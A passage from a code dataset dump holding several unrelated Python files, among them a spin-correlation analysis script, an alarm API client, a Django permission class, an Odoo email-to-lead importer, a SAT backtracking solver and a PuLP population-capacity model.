#self.btn_blur.pack(anchor=tkinter.CENTER, expand=True) \r\n# self.Vfilelist = []\r\n# self.Parameter = []\r\n# self.name = tkinter.StringVar(value='')\r\n# self.File_Labels = []\r\n# self.name = []\r\n# \r\n# self.window.mainloop()\r\n# \r\n# def Read_path1(self):\r\n# self.Path1 = askdirectory()\r\n# self.Vfilelist.append(self.Path1)\r\n# fileselected = []\r\n# self.ii = 0\r\n# self.File_Labels = []\r\n# for self.Vfile in self.Vfilelist:\r\n# fileselected.append(tkinter.Label(self.frame, text=self.Vfile)) #entry.place(x=10, y=10, width=100)\r\n# fileselected[self.ii].grid(row=3+self.ii, column=0)\r\n#\r\n# self.File_Labels.append(tkinter.Entry(self.frame,bd=1))#, textvariable=self.name,width=5)) #entry.place(x=10, y=10, width=100)\r\n# self.File_Labels[self.ii].grid(row=3+self.ii, column=1)\r\n## print(len(self.File_Labels))\r\n# self.ii = self.ii + 1 \r\n# \r\n# def Read_path2(self):\r\n# self.Path2 = askdirectory()\r\n# self.label_Read_path2 = tkinter.Label(self.frame,text=self.Path2)\r\n# self.label_Read_path2.grid(row=3+50+1,column=0)\r\n# \r\n# def Read_paramters(self):\r\n# self.Parameter = []\r\n# self.Parameter = [e.get() for e in self.File_Labels]\r\n# print(self.Parameter)\r\n# \r\n# def result(self):\r\n# return self.Vfilelist#, self.Path2, self.Parameter\r\n# \r\n#folder_locator = App(tkinter.Tk(), \"Tkinter and OpenCV\")\r\n##Save_folder_path = folder_locator.result()[0]\r\n#VertexStat_folder_list = folder_locator.result()[0]\r\n##Parameter = folder_locator.result()[2]\r\n\r\n\r\nVertexStat_folder_list = [\"C:/Users/vmpsk/UW_Research/MyWork/Simulations/InUse_MFM_analysis/testdata/2pin\"] \r\nstat_array = []\r\nfull_stat = []\r\nheader = []\r\nCorr_nn = []\r\nCorr_2nn = []\r\ni=0\r\nfor vertexstat_folder in VertexStat_folder_list:\r\n Xmoment_file = 'Sx_mfm.txt'\r\n Ymoment_file = 'Sy_mfm.txt' #'Sy' + file.split('Sx')[-1]#'Sy_mfm.txt'\r\n\r\n if (os.path.isfile(vertexstat_folder + '/' + Xmoment_file)==True):\r\n ####----Import data from files-------------------------------------------------\r\n mx_moment = MatrixImport(vertexstat_folder+'/'+Xmoment_file)\r\n n0Sx = mx_moment\r\n my_moment = MatrixImport(vertexstat_folder+'/'+Ymoment_file)\r\n n0Sy = my_moment\r\n# Sxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],2))\r\n# Sxy[:,:,0] = n0Sx\r\n# Sxy[:,:,1] = n0Sy\r\n\r\n n0Sx = np.transpose(n0Sx[~(n0Sx==0).all(1)])\r\n n0Sx = np.transpose(n0Sx[~(n0Sx==0).all(1)])\r\n n0Sx = np.delete(n0Sx, (-1), axis=0)\r\n n0Sy = np.transpose(n0Sy[~(n0Sy==0).all(1)])\r\n n0Sy = np.transpose(n0Sy[~(n0Sy==0).all(1)])\r\n n0Sy = np.delete(n0Sy, (-1), axis=1) \r\n Sxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],2))\r\n Sxy[:,:,0] = n0Sx\r\n Sxy[:,:,1] = n0Sy\r\n #####-----Initialize values---------------------------------------------------- \r\n a = np.array([0,0])\r\n b = np.array([0,0])\r\n #####--------------------------------------------------------------------------\r\n ####--List of x and y values range---------------------------------------------------------\r\n X = frange(0,10,1)\r\n Y = frange(0,10,1)\r\n r = []\r\n list_tuple = []\r\n for x in X:\r\n for y in Y:\r\n a = np.sqrt(x**2 + y**2)\r\n if (a not in r):\r\n r.append(np.sqrt(x**2 + y**2))\r\n r = sorted(r)\r\n t = [x,y]\r\n list_tuple.append(t)\r\n\r\n Cxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],len(r)))\r\n count = np.zeros((len(r)))\r\n count_i = 0\r\n \r\n for neighbor in list_tuple:\r\n [x,y] = neighbor\r\n print(x,y)\r\n a = np.sqrt(x**2 + y**2)\r\n distance_index = r.index(a)\r\n for i in range(n0Sx.shape[0]):\r\n for j in range(n0Sx.shape[1]):\r\n s = Sxy[i,j,0]\r\n\r\n if a != 0 and s!=0 and i-int(a) >=0 and j-int(a) >=0 and i+int(a) <=n0Sx.shape[0]-2 and j+int(a) <= n0Sx.shape[0]-2 :\r\n count[distance_index] = count[distance_index] + 1\r\n if((x+y)%2 == 0):\r\n if (Sxy[i,j,0] == Sxy[i-y,j-x,0]):\r\n Clt = 1\r\n else:\r\n Clt = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+y,j-x,0]):\r\n Clb = 1\r\n else:\r\n Clb = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-y,j+x,0]):\r\n Crt = 1\r\n else:\r\n Crt = -1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+y,j+x,0]):\r\n Crb = 1\r\n else:\r\n Crb = -1\r\n\r\n Cijxy = (Clt + Clb + Crb + Crt)/4\r\n\r\n if((x+y)%2 != 0):\r\n if (Sxy[i,j,0] == Sxy[i-y,j-x,0]):\r\n Clt = -1\r\n else:\r\n Clt = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+y,j-x,0]):\r\n Clb = -1\r\n else:\r\n Clb = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-y,j+x,0]):\r\n Crt = -1\r\n else:\r\n Crt = 1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+y,j+x,0]):\r\n Crb = -1\r\n else:\r\n Crb = 1\r\n \r\n Cijxy = (Clt + Clb + Crb + Crt)/4\r\n####################################################################################################\r\n if s!=0 and i-int(a) >=0 and j-int(a) >=0 and i+int(a) <=n0Sx.shape[0]-2 and j+int(a) <= n0Sx.shape[0]-2 :\r\n\r\n \r\n if((x+y)%2 == 0):\r\n if (Sxy[i,j,0] == Sxy[i-x,j-y,0]):\r\n Clt = 1\r\n else:\r\n Clt = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+x,j-y,0]):\r\n Clb = 1\r\n else:\r\n Clb = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-x,j+y,0]):\r\n Crt = 1\r\n else:\r\n Crt = -1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+x,j+y,0]):\r\n Crb = 1\r\n else:\r\n Crb = -1\r\n\r\n Cijyx = (Clt + Clb + Crb + Crt)/4\r\n\r\n if((x+y)%2 != 0):\r\n if (Sxy[i,j,0] == Sxy[i-x,j-y,0]):\r\n Clt = -1\r\n else:\r\n Clt = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+x,j-y,0]):\r\n Clb = -1\r\n else:\r\n Clb = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-x,j+y,0]):\r\n Crt = -1\r\n else:\r\n Crt = 1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+x,j+y,0]):\r\n Crb = -1\r\n else:\r\n Crb = 1\r\n \r\n Cijyx = (Clt + Clb + Crb + Crt)/4\r\n####################################################################################################\r\n Cxy[i,j,distance_index] = (Cijxy+Cijyx)/2\r\n\r\nCorr = np.zeros((len(r))) \r\nfor distance_index in range(np.size(count)):\r\n if count[distance_index] != 0:\r\n Corr [distance_index] = Cxy[:,:,distance_index].sum()/count[distance_index]\r\n \r\nr = np.delete(r, (0), axis=0)\r\nCorr = np.delete(Corr, (0), axis=0)\r\n\r\nf = plt.figure(1)\r\nplt.clf()\r\nplt.scatter(r,Corr)\r\nf.show() \r\n# Cnn = Cxy.sum()/((n0Sx != 0).sum()+(n0Sy != 0).sum()) \r\n# Corr_nn.append(Cnn) \r\n\r\n\r\n\r\n### save correlation data ###################\r\n#np.savetxt(Save_folder_path + '/'+'Nearest neighbor correlation.txt', np.transpose(np.vstack([Parameter,Corr_nn])), delimiter='\\t',fmt='%s')\r\n","sub_path":"GUI_Read_AFMCorrelation_V2.py","file_name":"GUI_Read_AFMCorrelation_V2.py","file_ext":"py","file_size_in_byte":11742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152123161","text":"#!/usr/bin/env python\r\n# Copyright (c) 2013-2014 Wind River Systems, Inc.\r\n#\r\n# The right to copy, distribute, modify, or otherwise make use\r\n# of this software may be licensed only pursuant to the terms\r\n# of an applicable Wind River license agreement.\r\n\r\nfrom cgtsclient.common import base\r\nfrom ceilometerclient.v2 import options\r\n\r\nclass ialarm(base.Resource):\r\n def __repr__(self):\r\n return \"\" % self._info\r\n\r\n\r\nclass ialarmManager(base.Manager):\r\n resource_class = ialarm\r\n\r\n @staticmethod\r\n def _path(id=None):\r\n return '/v1/ialarms/%s' % id if id else '/v1/ialarms'\r\n\r\n def list(self, q=None, limit=None, marker=None, sort_key=None,\r\n sort_dir=None, include_suppress=False):\r\n params = []\r\n\r\n if include_suppress:\r\n params.append('include_suppress=True')\r\n if limit:\r\n params.append('limit=%s' % str(limit))\r\n if marker:\r\n params.append('marker=%s' % str(marker))\r\n if sort_key:\r\n params.append('sort_key=%s' % str(sort_key))\r\n if sort_dir:\r\n params.append('sort_dir=%s' % str(sort_dir))\r\n\r\n return self._list(options.build_url(self._path(), q, params), 'ialarms')\r\n\r\n def get(self, iid):\r\n try:\r\n return self._list(self._path(iid))[0]\r\n except IndexError:\r\n return None\r\n\r\n def delete(self, iid):\r\n return self._delete(self._path(iid))\r\n\r\n def summary(self, include_suppress=False):\r\n params = []\r\n if include_suppress:\r\n params.append('include_suppress=True')\r\n return self._list(options.build_url(self._path('summary'), None ,params))\r\n","sub_path":"wrs-remote-clients-2.0.2/python-wrs-system-client-1.0/build/lib/cgtsclient/v1/ialarm.py","file_name":"ialarm.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226618054","text":"from rest_framework import permissions\nfrom time import time\nfrom AILab.settings import AUTH_TIME_DELTA as timeDelta\n\n\nclass IsLogin(permissions.BasePermission):\n message = 'you\\'re not Authenticate'\n\n def has_permission(self, request, view):\n\n if (request.user==None):\n return False\n if (request.user.last_activity+timeDelta > time() and request.user.login_status==True):\n return True\n\n return False\n\n def has_object_permission(self, request, view, obj):\n return self.has_permission(request,view)","sub_path":"website/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273454992","text":"# https://www.hackerrank.com/challenges/html-parser-part-1/problem\n\nfrom html.parser import HTMLParser\n\n\nclass MyHTMLParser(HTMLParser):\n\n def handle_startendtag(self, tag, attrs):\n print('Empty :', tag)\n for att in attrs:\n print('-> {0} > {1}'.format(att[0], att[1]))\n\n def handle_starttag(self, tag, attrs):\n print('Start :', tag)\n for att in attrs:\n print('-> {0} > {1}'.format(att[0], att[1]))\n\n def handle_endtag(self, tag):\n print('End :', tag)\n\n\nparser = MyHTMLParser()\nfor _ in range(int(input())):\n parser.feed(input())\n","sub_path":"13-regex-and-parsing/11-html-parser-1.py","file_name":"11-html-parser-1.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8961010","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nfrom openerp import models, api\nfrom .settings import LANDINGPAGE_EMAIL_PARAM_KEY\n\n\n__author__ = 'Rui Coelho'\n_logger = logging.getLogger(__name__)\n\n_LEAD_ORIGIN_LANDINGPAGE_REF = 'pdf_crm_extensions.product_origin_landingpage'\n_LANDINGPAGE_FROM_ADDRESSES = [u'info@santamartaresidences.com']\n_LANDINGPAGE_INCLUDE_SUBJECT = u'[Landing Page]'\n\n\nclass landingpage_mail_message(models.TransientModel):\n \"\"\"\n Mail message\n \"\"\"\n _name = 'landingpage.mail.message'\n _inherit = ['mail.message', 'automatic.leads.mixin']\n\n @staticmethod\n def _parse_email(email_body):\n \"\"\"\n Parse the email body from contact of a landing page\n :param email_body: email body text\n :return: parsed data\n \"\"\"\n product_reference = re.search(r'Refer\\xeancia:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_name = re.search(r'Nome:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_email = re.search(r'Email:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_phone = re.search(r'Telefone:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n comment = re.search(r'Mensagem:(.*)Refer\\xeancia', email_body.replace('\\r\\n', '\\r')).groups()[0].replace('\\r', '\\r\\n').strip()\n \n result = {\n 'product_code': product_reference,\n 'contact_name': contact_name,\n 'contact_email': contact_email,\n 'contact_phone': contact_phone,\n 'name': comment\n }\n\n _logger.info('Extracted data from email: %s', result)\n return result\n\n @api.model\n def mails_to_leads(self):\n \"\"\"\n Load emails received from landing pages and create leads from them\n \"\"\"\n latest_processed_email_id = self.env['ir.config_parameter'].get_param(LANDINGPAGE_EMAIL_PARAM_KEY)\n search_domain = [('type', '=', 'email'), ('id', '>', latest_processed_email_id or 0)]\n search_domain.append(('subject', 'ilike', _LANDINGPAGE_INCLUDE_SUBJECT))\n search_domain += ['|'] * (len(_LANDINGPAGE_FROM_ADDRESSES) - 1) + [('email_from', 'ilike', from_address) for from_address in _LANDINGPAGE_FROM_ADDRESSES]\n\n emails_to_process = self.env['mail.message'].search(search_domain)\n \n origin = self.env.ref(_LEAD_ORIGIN_LANDINGPAGE_REF)\n _logger.info('Processing %i emails from landing pages', len(emails_to_process))\n for email in emails_to_process:\n try:\n parsed_email_data = landingpage_mail_message._parse_email(email.body)\n name = parsed_email_data['contact_name']\n phone = parsed_email_data['contact_phone']\n email_address = parsed_email_data['contact_email']\n self.env['res.partner'].create_or_update(name, phone, email_address, origin.id)\n self._create_lead(parsed_email_data, origin.id)\n except Exception as ex:\n _logger.exception(ex)\n error_context = {}\n error_context['origem'] = 'Email landing page'\n error_context['assunto'] = email.subject\n error_context['email'] = email.body\n self.send_error_notification(error_context)\n\n if len(emails_to_process) > 0:\n self.env['ir.config_parameter'].set_param(LANDINGPAGE_EMAIL_PARAM_KEY, max(emails_to_process.ids))\n","sub_path":"pdf_external_leads/models/landingpage_mail_message.py","file_name":"landingpage_mail_message.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171395975","text":"# backtrack-cde.py : tree evaluates sat\n# Team : CDE: Chris-Donny-Emily\n# Date : 9-26-17\n\n\n# Imports:\nimport sys\nimport os\nimport string\nimport time\nimport random\n\n# Globals:\nVALUE_STACK = []\nFILE_NAME = ''\nBINARY = ''\nINPUT = ''\nWFF = ''\nCOMMENT_LINE = [] # Array - ['c', prob. #, max # literals, (un)solvability]\nPROBLEM_LINE = [] # Array - ['p', file format, # variables, # clauses]\nTOT_LITERALS = 0 # Needed for output\nSTART_TIME = None # Needed for execution time\nEND_TIME = None # \" \" \" \"\nNUM_S = 0\nNUM_U = 0\nNUM_ANSWERS = 0\nNUM_CORRECT = 0\n\n#one command line argument --> name of file to read wffs in from\n#binary argument that turns on or off optional tracing 1 yes, 0 not\n\n\ndef usage(exit_status=0):\n\tprint('''Usage: brute-cde.py [FILE_NAME] [BINARY]\n\t\tFILE_NAME\t\t\tThe file to be read that contains wffs.\n\t\tBINARY \t\t\t\t1 = Triggers Optional Tracing ; 0 = Suppress Intermediate Output''')\n\tsys.exit(exit_status)\n\n\n#reads in the next wff from a specified input file\ndef readFile():\n\tf = open(FILE_NAME, 'r')\n\tglobal INPUT\t\n\tINPUT = f.read()\t\n\n\n#generates the next possible assingment for the current wff you are working with\n#def nextPossibleAssignment():\n\n\n#takes a wff and an assignment and returns whether or not the assignment satisfied the wff\ndef verify():\n\tvalue_stack = [] # Stack with values for variables ex) [0, 1, 1, 0, 0]\n\twff_stack = [] # Stack with wffs in characterronological order, each one in gets more reduced\n\ttried_stack = [] # Keeps track of variables for which both values were tried\n\tflag = False\n\tevaluating = True\n\tbacktrack = False\n\n\tWFF_Clauses = WFF.split(',0')\n\tWFF_Clauses.remove('') \t\n\n\twff_stack.append(WFF_Clauses)\n\n\tglobal TOT_LITERALS\n\tTOT_LITERALS = len(WFF_Clauses) * len(WFF_Clauses[2].split(','))\n\n\twhile evaluating:\n\t\tnum_trues = 0\n\t\tfor var in tried_stack: # Count the number of trues\n\t\t\tif var == True:\n\t\t\t\tnum_trues = num_trues + 1\n\n\t\tnum_trues_row = 0\n\t\tfor rev in reversed(tried_stack): # Count the number of trues in a row from the bottom\n\t\t\tif rev == True:\n\t\t\t\tnum_trues_row = num_trues_row + 1\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tif num_trues == PROBLEM_LINE[2]: # If the number of trues is equal to the number of variables, all variables have tried all possibilities and the wff is unsatisfiable\n\t\t\tevaluating = False\n\t\t\tbreak\n\t\t\n\t\t\n\n\t\tif len(tried_stack) == 0 and len(value_stack) != 0: # If the number of trues is equal to the number of variables, all variables have tried all possibilities and the wff is unsatisfiable\n\t\t\tevaluating = False\n\t\t\tbreak\n\n\t\tnum_clauses = 0\n\t\tfor c in wff_stack[-1]:\n\t\t\tif c != '':\n\t\t\t\tnum_clauses = num_clauses + 1\n\n\t\tif num_clauses == 0: # If the most recent wff is empty, then the wff is satisfiable\n\t\t\tflag = True\n\t\t\tevaluating = False\n\t\t\tbreak\n\t\telif len(value_stack) == int(PROBLEM_LINE[2]): # If we have reached the end of a branch (we have all variables assigned to something) backtrack and reassign that value\n\t\t\ttried_value = value_stack.pop()\n\t\t\twff_stack.pop()\n\t\t\tif tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\telif backtrack == True: # Backtrack if any of the clauses in the previous wff were false\n\t\t\ttried_value = value_stack.pop()\n\t\t\twff_stack.pop()\n\t\t\tif tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\telse: # Go down the tree and assign randomly the next variable value\n\t\t\tvalue_stack.append(random.randint(0,1))\n\t\t\ttried_stack.append(False)\n\n\n\t\tif len(tried_stack) > 1 and tried_stack[-1] == True: # If both values were tried for the current variable, backtrack twice and reassign variable from above\n\t\t\tfor i in xrange(0, num_trues_row):\n\t\t\t\tvalue_stack.pop()\n\t\t\t\tif len(wff_stack) != 1:\n\t\t\t\t\twff_stack.pop()\n\t\t\t\ttried_stack.pop()\n\t\t\tif len(tried_stack) == 0:\t\n\t\t\t\tbreak\n\t\t\ttried_stack.pop()\n\t\t\ttried_value = value_stack.pop()\n\t\t\tif tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.append(True)\n\t\t\n\t\tbacktrack = False\n\t\tClauses_Next = wff_stack[-1][:] # Initialize the next wff as the current wff\n\t\tremove_clauses = [] # List of clauses to be removed from current wff\n\t\tindex_count = 0\n\n\t\tfor clause in Clauses_Next: # Here, we go through the current wff and edit it to create the next wff\n\t\t\tvariables = clause.split(',') # '-1,2,3' --> ['-1', '2', '3']\n\t\t\tremove_variables = []\n\t\t\tvariable_count = 0\n\t\t\tfor variable in variables: # Go through each variable in the clause\n\t\t\t\tall_same = False\n\t\t\t\tif len(variables) > 1:\n\t\t\t\t\tall_same = True\n\t\t\t\t\ttemp = variable\n\t\t\t\t\tfor x in range(0, len(variables)): # Flag for if all variables in clause are the exact same variable\n\t\t\t\t\t\tif variables[x] == temp:\n\t\t\t\t\t\t\ttemp = variables[x]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tall_same = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\tif variable != '' and abs(int(variable)) == len(value_stack):\n\t\t\t\t\tif int(variable) < 0:\n\t\t\t\t\t\tif value_stack[-1] == 0: # If the variable is 1, this clause returns true and move on to next clause\n\t\t\t\t\t\t\tremove_clauses.append(index_count) # Add this clause to clauses to be removed\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # If the variable is 0, it is removed and the rest of the clause moves on down the branch\n\t\t\t\t\t\t\tif not all_same and len(variables) != 1:\n\t\t\t\t\t\t\t\tremove_variables.append(variable_count)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value_stack[-1] == 1: # If the variable is 1, this clause returns true and move on to next clause\n\t\t\t\t\t\t\tremove_clauses.append(index_count) # Add this clause to clauses to be removed\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # If the variable is 0, it is removed and the rest of the clause moves on down the branch\n\t\t\t\t\t\t\tif not all_same and len(variables) != 1:\n\t\t\t\t\t\t\t\tremove_variables.append(variable_count)\n\t\t\t\tvariable_count = variable_count + 1\n\t\t\t\n\t\t\tfor ind in remove_variables:\n\t\t\t\tvariables[ind] = ''\n\n\t\t\tClauses_Next[index_count] = ','.join(variables)\n\n\t\t\t\t\n\t\t\tif Clauses_Next[index_count] != '' and Clauses_Next[index_count][0] == ',': # Remove leading comma\n\t\t\t\tClauses_Next[index_count] = Clauses_Next[index_count][1:]\n\n\t\t\tif Clauses_Next[index_count] != '' and Clauses_Next[index_count][-1] == ',': # Remove trailing comma\n\t\t\t\tClauses_Next[index_count] = Clauses_Next[index_count][:-1]\n\n\t\t\tcommas = 0\n\t\t\tfor char in Clauses_Next[index_count]:\n\t\t\t\tif char == ',':\n\t\t\t\t\tcommas = commas + 1\n\n\t\t\tif commas == len(Clauses_Next[index_count]): # Remove clauses of just commas\n\t\t\t\tClauses_Next[index_count] = ''\n\t\t\t\n\t\t\tlength = 0\n\t\t\tfor var in variables:\n\t\t\t\tif var != '':\n\t\t\t\t\tlength = length + 1\n\n\t\t\tif length == 1 and variables[0] != '': # If a clause only has one variable and that variable evaluates 0, the entire wff is false so we backtrack\n\t\t\t\tif abs(int(variables[0])) == len(value_stack):\n\t\t\t\t\tif int(variables[0]) < 0:\n\t\t\t\t\t\tif value_stack[-1] == 1:\n\t\t\t\t\t\t\tbacktrack = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value_stack[-1] == 0:\n\t\t\t\t\t\t\tbacktrack = True\n\t\t\t\t\t\t\tbreak\n\t\t\tindex_count = index_count + 1\n\n\t\tfor i in remove_clauses: # where i is the indices of Clauses_Next to be removed\n\t\t\tClauses_Next[i] = ''\n\t\twff_stack.append(Clauses_Next) # Add the newly edited current wff to the stack\n\n\tglobal VALUE_STACK\n\tVALUE_STACK = value_stack\n\treturn flag\n\n\n\n#generates the output line for the wff in the desired format\ndef output(f, verified):\n\tglobal NUM_ANSWERS, NUM_CORRECT, NUM_S, NUM_U\n\tEXECUTION_TIME = (END_TIME - START_TIME)* 10**6\n\t\n\t# Predict SAT.\n\tCOMPARE = '0'\n\tif COMMENT_LINE[3] != '?':\n\t\tNUM_ANSWERS = NUM_ANSWERS + 1\n\t\t# Compare SAT to Answer SAT.\n\t\tCOMPARE = '-1'\n\t\tif SAT == COMMENT_LINE[3]:\n\t\t\tNUM_CORRECT = NUM_CORRECT + 1\n\t\t\tCOMPARE = '1'\n\n\tif verified:\n\t\tNUM_S = NUM_S + 1\n\t\tbit_string = ','.join(str(val) for val in VALUE_STACK)\n\t\t# Prob No., No. Var., No. Clauses, Max Lit., Tot. Lit., S/U, 1/-1, Exec. Time, 1/0 (SAT)\n\t\tf.write('{0},{1},{2},{3},{4},{5},{6},{7:.2f},{8}\\n'.format(COMMENT_LINE[1], PROBLEM_LINE[2], PROBLEM_LINE[3], COMMENT_LINE[2], TOT_LITERALS, SAT, COMPARE, EXECUTION_TIME, bit_string))\n\telse:\n\t\tNUM_U = NUM_U + 1\n\t\tf.write('{0},{1},{2},{3},{4},{5},{6},{7:.2f}\\n'.format(COMMENT_LINE[1], PROBLEM_LINE[2], PROBLEM_LINE[3], COMMENT_LINE[2], TOT_LITERALS, SAT, COMPARE, EXECUTION_TIME))\n\n#should time the execution time take for each wff starting with the first call \n#to the assignment generator to the completion of the call to verify and avoid the\n#time to read and parse the wff from the given file and the tiem to generate the output file\n#this time should be in microseconds\n\n#using package time; time.time(), gives current time in seconds.\n\nnum_wffs = 0\n# Parse Command Line:\nif len(sys.argv[1:]) != 2:\n\tusage(1)\nFILE_NAME = sys.argv[1]\nBINARY = sys.argv[2]\n\nOUTPUT_FILE = FILE_NAME.split('/')[1]\nOUTPUT_FILE = OUTPUT_FILE.split('.')[0]\nf = open('backtrack-'+OUTPUT_FILE+'.csv', 'w')\n\nreadFile() # INPUT contains raw file\n\nlines = INPUT.split('\\n')\n\nfor i in range(0, len(lines)):\n\t# Check for 'p' Lines:\n\tif 'p' in lines[i]:\n\t\tstrippedLine = lines[i].strip('\\r')\n\t\tPROBLEM_LINE = strippedLine.split(' ')\n\t\n\t# Check For 'c' Lines:\n\telif 'c' in lines[i]:\n\t\tWFF = ''\n\t\tBIT_ASSIGNMENT_S = ''\n\t\tCOMMENT_LINE = []\n\t\tPROBLEM_LINE = []\n\n\t\tstrippedLine = lines[i].strip('\\r')\n\t\tCOMMENT_LINE = strippedLine.split(' ')\n\t\n\t# Add WFF lines to WFF string\n\telse:\n\t\tWFF = WFF + lines[i].strip('\\r')\n\t\t# If the next character is a 'c', evaluate the current WFF\n\t\tif 'c' in lines[i+1]:\n\t\t\tnum_wffs = num_wffs + 1\n\n\t\t\t# Verify the wff\n\t\t\tflag = False\n\t\t\tSAT = 'U'\n\t\t\tSTART_TIME = time.time()\n\t\t\tif(verify()):\n\t\t\t\tflag = True\n\t\t\t\tSAT = 'S'\n\t\t\tEND_TIME = time.time()\n\t\t\toutput(f, flag)\n\t\tif i+2 == len(lines):\n\t\t\tnum_wffs = num_wffs + 1\n\n\t\t\t# Verify the wff\n\t\t\tflag = False\n\t\t\tSAT = 'U'\n\t\t\tSTART_TIME = time.time()\n\t\t\tif(verify()):\n\t\t\t\tflag = True\n\t\t\t\tSAT = 'S'\n\t\t\tEND_TIME = time.time()\n\t\t\toutput(f, flag)\n\t\t\ti = len(lines)\n\t\t\tbreak\n\nf.write('{0},cde,{1},{2},{3},{4},{5}'.format(FILE_NAME, num_wffs, NUM_S, NUM_U, NUM_ANSWERS, NUM_CORRECT))\nf.close()","sub_path":"backtrack-cde.py","file_name":"backtrack-cde.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"240123761","text":"import pulp\n\nmy_lp_problem = pulp.LpProblem(\"My LP Problem\", pulp.LpMaximize)\n\n######### -------- VARIABLES -------- ########\n# Numero de personas, queremos maximizar\nNP = pulp.LpVariable('Numero Personas', lowBound=0, cat='Continuous')\n# Cantidad de comida que se produce, cal/año\nNc = pulp.LpVariable('Numero Comida', lowBound=0, cat='Continuous')\n# Espacio que se ocupa para producir la comida en metros cuadrados\nEc = pulp.LpVariable(\"Espacio Comida\", lowBound=0, cat='Continuous')\n# Numero de viviendas\nNv = pulp.LpVariable(\"Numero Viviendas\", lowBound=0, cat='Continuous')\n# Espacio total que ocupan las viviendas en metros cuadrados\nETV = pulp.LpVariable(\"ETV\", lowBound=0, cat='Contirnuous')\n\n######### -------- PARAMETROS -------- ########\n# Porcentaje cultivable de la superficie terrestre del planeta\nPc = 0.37\n# Porcentaje habitable de la superficie terrestre de la tierra, metros cuadrados\nPh = 0.33\n# Porcentaje no habitable de la superficie terrestre de la tierra, metros cuadrados\nPnh = 0.67\n# Superficie terrestre del planeta\nT = 148940000000000\n# Espacio no habitable de la tierra, metros cuadrados\nEnh = T * Pnh\n# Kilocalorias que una persona necesita al dia\nX1 = 1500000\n# Espacio de una vivienda\nEv = 37\n# Rendimiento de la comdia por metro cuadrado\nRc = 2743\n\nTh = T * 0.71\nTc = Th * 0.38\n\n\n\n######### -------- FUNCION OBJETIVO -------- ########\nmy_lp_problem += NP, \"Z\"\n\n\n# el espacio que ocupan las viviendas tiene que ser igual al espacio que ocupa 1 vivienda por la cantidad de personas\n#my_lp_problem += ETV <= Ev*NP\n\n######### -------- RESTRICCIONES -------- ########\n\n#### ---- RESTRICCIONES GENERALES ---- ####\n#my_lp_problem += T - Enh >= Ec + ETV\n#my_lp_problem += NP*1 != 0 # numero de personas tiene que ser distinto de 0\n\n\n#### ---- RESTRICCIONES PARA LAS VIVIENDAS ---- ####\nmy_lp_problem += NP <= Nv # el numero de personas tiene que ser menor o igual a las viviendas (1:1)\nmy_lp_problem += ETV <= Ph*T # el area que ocupan las viviendas tiene que ser menor o igual al espacio habitable\nmy_lp_problem += Nv == ETV/Ev # espacio que ocupan las casas partido en el numero de casas\n\n#### ---- RESTRICCIONES PARA LA COMIDA ---- ####\nmy_lp_problem += NP <= Nc*1/X1 # numero de personas tiene que ser menor que la comida que se produce/lo que 1 come\n#my_lp_problem += Ec <= Pc*T # Ec tiene que ser menor al area cultivable\n#my_lp_problem += Ec*1 != 0 # Ec tiene que ser distinto de 0 (si te da negativo hiciste algo como el hoyo)\nmy_lp_problem += Nc == Ec*Rc # espacio ocupado en comida por lo que produce cada espacio = total comida prod.\nmy_lp_problem += Ec == (547500000*NP)/274300000000 #\nmy_lp_problem += Ec + ETV <= Th # suma de areas tiene que ser menor o igual a 